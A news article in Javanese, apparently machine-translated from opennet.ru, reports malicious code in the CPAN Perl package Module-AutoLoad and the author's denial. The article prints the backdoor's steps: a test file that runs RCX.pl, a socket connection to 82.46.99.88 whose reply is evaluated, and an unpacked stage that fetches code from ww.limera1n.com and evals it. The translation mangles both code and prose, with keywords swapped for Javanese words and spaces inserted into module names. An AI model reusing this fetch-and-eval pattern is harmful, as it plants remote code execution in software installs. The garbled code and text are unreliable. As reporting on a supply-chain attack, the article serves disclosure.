Kode ala dideteksi ing paket Modul-AutoLoad Perl

Ing paket Perl sing disebarake liwat direktori CPAN Modul-Muat Otomatis, dirancang kanggo mbukak modul CPAN kanthi otomatis kanthi cepet, dikenali kode angkoro. Sisipan angkoro yaiku ketemu ing kode test 05_rcx.t, sing wis dikirim wiwit 2011.
Wigati dimangerteni manawa ana pitakonan babagan ngemot kode sing bisa dipertanyakan Stackoverflow bali ing 2016.

Kegiatan angkoro boils mudhun kanggo nyoba kanggo ngundhuh lan nglakokakΓ© kode saka server pihak katelu (http://r.cx:1/) sak execution saka test Suite dibukak nalika nginstal modul. Dianggep kode sing wiwitan diundhuh saka server eksternal ora mbebayani, nanging saiki panjaluk kasebut dialihake menyang domain ww.limera1n.com, sing nyedhiyakake bagean kode kanggo eksekusi.

Kanggo ngatur download ing file 05_rcx.t Kode ing ngisor iki digunakake:

sandi $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Kode sing ditemtokake nyebabake skrip dieksekusi ../contrib/RCX.pl, isine dikurangi dadi baris:

gunakake lib do {eval<$b>&&botstrap("RCX") if$b= new IO :: Socket :: INET 82.46.99.88.":1β€³};

Skrip iki dimuat bingung nggunakake layanan perlobfuscator.com kode saka r.cx inang external (kode karakter 82.46.99.88 cocog kanggo teks "R.cX") lan kaleksanan ing pemblokiran eval.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1β€³; print <$b>;'
eval unpack u =>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

Sawise unpacking, ing ngisor iki pungkasanipun kaleksanan: kode:

print{$b=new IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
"; evalor bali warn$@while$b;1

Paket masalah saiki wis dibusak saka repositori. Ngaso (Perl Authors Upload Server), lan akun penulis modul diblokir. Ing kasus iki, modul isih tetep kasedhiya ing arsip MetaCPAN lan bisa langsung diinstal saka MetaCPAN nggunakake sawetara keperluan kayata cpanminus. Wis kacathetyen paket kasebut ora disebarake kanthi akeh.

Menarik kanggo rembugan disambungake lan penulis modul, sing mbantah informasi sing kode angkoro dilebokake sawise situs "r.cx" disusupi lan nerangake yen dheweke mung seneng-seneng, lan nggunakake perlobfuscator.com ora kanggo ndhelikake soko, nanging kanggo nyuda ukuran. kode lan nyederhanakake nyalin liwat clipboard. Pilihan jeneng fungsi "botstrap" diterangake kanthi kasunyatan manawa tembung iki "katon kaya bot lan luwih cendhek tinimbang bootstrap." Penulis modul kasebut uga njamin yen manipulasi sing diidentifikasi ora nindakake tumindak ala, nanging mung nduduhake loading lan eksekusi kode liwat TCP.

Source: opennet.ru

Add a comment